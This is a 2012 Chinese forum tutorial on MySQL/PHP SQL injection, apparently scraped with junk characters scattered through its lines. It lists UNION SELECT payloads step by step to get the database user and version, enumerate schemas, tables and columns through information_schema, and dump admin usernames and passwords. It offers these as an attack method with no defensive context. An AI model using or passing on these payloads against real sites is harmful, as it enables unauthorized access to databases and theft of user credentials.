6 c! ~5 n) R) Y1 W
教程内容:Mysql 5+php 注入
1 b/ F6 H) ?% c! @: L: _# {* v' b8 }9 z, q! O/ X" K
_: g( V. ?. C$ I8 ?! ^7 `* t8 E- t! e) l3 c
一.查看MYSQL基本信息(库名,版本,用户)9 ?' m/ A' q& c A; t; m
2 t; S' X: R( uand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*0 A! W( _5 p0 t9 V# p, J
! n. g7 ~$ |2 l2 j7 ~7 Q
二.查数据库
f) s! |3 n4 |( H* {5 i3 @+ [* P& c/ R" c7 ]# H
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
0 A% p5 ]% u9 llimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。$ e" d d6 g3 k. s1 Z; c9 ^3 _1 O( P
/ `. ^& X& q7 I" b x- M; t; x三.暴表
. ]9 C7 l% l& ?$ r( R, Y; d! \1 b
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
: T( u \! Q0 K+ i; |2 e0 K, K
. H; N9 G6 |8 }8 u8 J, c8 W8 zlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
& M+ i% B: F0 y+ h! R- z& v' n( D- w$ Q5 o
四.暴字段
4 \- e0 s0 G- W" N. k' N
" |2 m$ q0 \. S" `# [1 gand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
; P/ q* S( s6 G2 u5 ]
1 Q7 T1 s$ H5 rlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。7 A9 D% H8 j( t- T6 @, o7 m
! i- C9 \- n( C- Q7 W+ X
五.暴数据% }# a1 ], i }
3 U0 Y) ~ u; ]and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
, m4 K4 G% G7 _3 [
* X- X2 M$ ^4 ~7 q& ]$ c. B# W
x! V7 o$ N7 Q这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
( L8 n, f+ ^7 ]- C0 T: c n! a |
发表于 2012-9-13 16:27:53
收藏
支持
反对